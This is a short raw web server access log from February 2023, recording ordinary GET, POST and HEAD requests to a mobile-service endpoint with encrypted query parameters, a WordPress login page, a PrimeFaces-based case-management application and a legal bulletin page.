186.102.31.42 - - [23/Feb/2023:06:46:24 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX188S14cNhJyyugrFbmS/bwEAFrAPA+tm+Y2qQ2Aw+70zJxZRzfwR6g5RNF8jDttXbjQJqONgbjmqaBGgx2DJjhIrVbqjsnCXiDJyaEUmecbrCk8rBDuPj2W3o39zo4zdi3XhB1pmjQxbze6ltyV83VG3RovGrOWX2wXb8WgDPHpl9oz431KXl1Z/K5Ym/WQH8Tw+dtFS75C2GAkIwE6ms4J9jOmkJz7rr+wJFajhqBgV0Bt02PfHnJzA+GZOIaM2pjUFkNksbtvfPNCWqAdlm1jW+6Ayth0+nbmKU14VDkI/ylK+gOisipJu/zUbUctSdfbRvsb0XKcEgms51nDZftlmkDFyiOSPXL1/MJwOFskNZZHtPqXiq6zeDa22+7R43NTbrwEmN/XgMjxd6jz797+D1MthG+W8K6+J9ViPzP/AbgU5hHmR7rHXxi4J+pJ6xfAJQUKJmZTqF/dNuaFj5F5P9V/HCWP8drHpZk1o0JPbChvoiME5S3q7S+z5vMdSLR+zqNskkXoObdbFJjSv8z89jyHC8E09DYUsNTOMmPL+yuN9QruTiBicty/G5yeeGqzW6WNVyeEskiRW2WHqzvHlD6z6/OTl/ds207SzES17im0CZ3RnEkjm22BIZBcT4HUCGO1TO8Y3bM0DpFhGcU+Tex2qxd8KdOBOFWr6/aQFQJIQAhn3/TjagDOdw9HLD3sTYaE2C70i3xN/ntefqvwWW4p89pq5uMBRvjzIba0D13uF6L29HLrFXLNamLMR82MLDsUNhNHDPhZkaWLmPGsg1BQ/fZ+q247LFPqE+LaA158lb8z7r5Q3P6KAzx4NPAYwfqomZczuFsZdma1OBc3Va757MmTCXH8PgQzyLW9RT68rNyUwNd1lZnLApi9WxcUoUy2tEkdYf50vpSUHkq77QWYJQ5gxTlDLIvlChW06rQ7lvJuAxbm7wnyYENQsd9dvTFp8h3z4S1sxWOViEY2bEKicV4FC95VjvrRkxLsDyMCZ/nvaTAHRMBZDXQ9mX6ncYMi8MTQJ0cmOAfZpv8mwTsBwrmIFTPS3rDWMqRHQDed6358JB+JvDFvnpDXH55v2W/O9C2l5aAUQW93MbR1bKjAkQyDjrOq2w90HQolszxQjRqemgZqbBDA2hiabOkenxZdVPHT5mUe7RvK0lh1i3ZyZmpg8wRk0erbL8SNDbaqgngHkzQ6MWv4Yt97pQ2w60m+SCBb63AEtD+giCKeKm38ElgY5bHhLoYeySGZd0u76RAdTi3w90nV/vp9L/DZmtWfmwkfKE4ZrBr980oDcT9BmBKVJFwyAyXYs3YWB1YY4ycPtYOXCmDVOme6yHfxrYEZ0G3OizcYf1mMvpjo+xfXHuMkhun1Pc4S5QJtbBRJAgTTY5tGpHv67Ku0ZZC64uUkA49MIrPpqU+q207XZviia04j2p4=&u=U2FsdGVkX1+gsWV33bpew6uYZimRWluVDbwxOaJ8Y0ES6g2OLXphLaoHixiFR2oz&y=U2FsdGVkX19NkbslMHMDrZ89/jhVF2nFUhFFowKV7E4TQw1UlDVAqvmoQzFuQTUR HTTP/1.1" 200 1561
186.102.31.42 - - [23/Feb/2023:06:46:24 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX183p6gWspIjX1/HQ5VVNTaRRuP3o/NSOFx65QzZpaOOUiZHeIruiJE6cd2Onu6Ra47deMZwSA8YScmcOt4b3ZzTzRf4sxn0QPwR4WD2XnXuiozRK1nH9Ses48DhwDeQkcIC4B+0Mq59y6tSWMH5YAXs6JppxIjajFKa0dorp0WgMPvaOnTtBRe7Ys7j7sR/B/F1DnBLnOaYkG7ApKQPKkBZZPsQJxCIjMxvGimlaq0+GR1ZKtSgmn7WkEkdYnQB0OwFwOAOdfSk5Vj5SQ32MVTw2LnrLYPcJ2vNOzOTG7UJiKiJaK/DIyyy/5ve7YBAVi4xIZheDxPh72Vz9YKH/nFWZZ0PvyIqpq8=&u=U2FsdGVkX1+gsWV33bpew6uYZimRWluVDbwxOaJ8Y0ES6g2OLXphLaoHixiFR2oz&y=U2FsdGVkX19NkbslMHMDrZ89/jhVF2nFUhFFowKV7E4TQw1UlDVAqvmoQzFuQTUR HTTP/1.1" 200 196
185.119.81.104 - - [23/Feb/2023:06:46:24 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
186.102.31.42 - - [23/Feb/2023:06:46:24 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19HE+xS0eFy9WJ934m7Q0+wgI8zYwC3ntIu2313VzYDS9/NqXLkMkCL HTTP/1.1" 200 31032
172.22.2.4 - - [23/Feb/2023:06:45:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.155.74.60 - - [23/Feb/2023:06:47:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 135431
186.155.74.60 - - [23/Feb/2023:06:47:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [23/Feb/2023:06:46:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19356
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:47:57 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
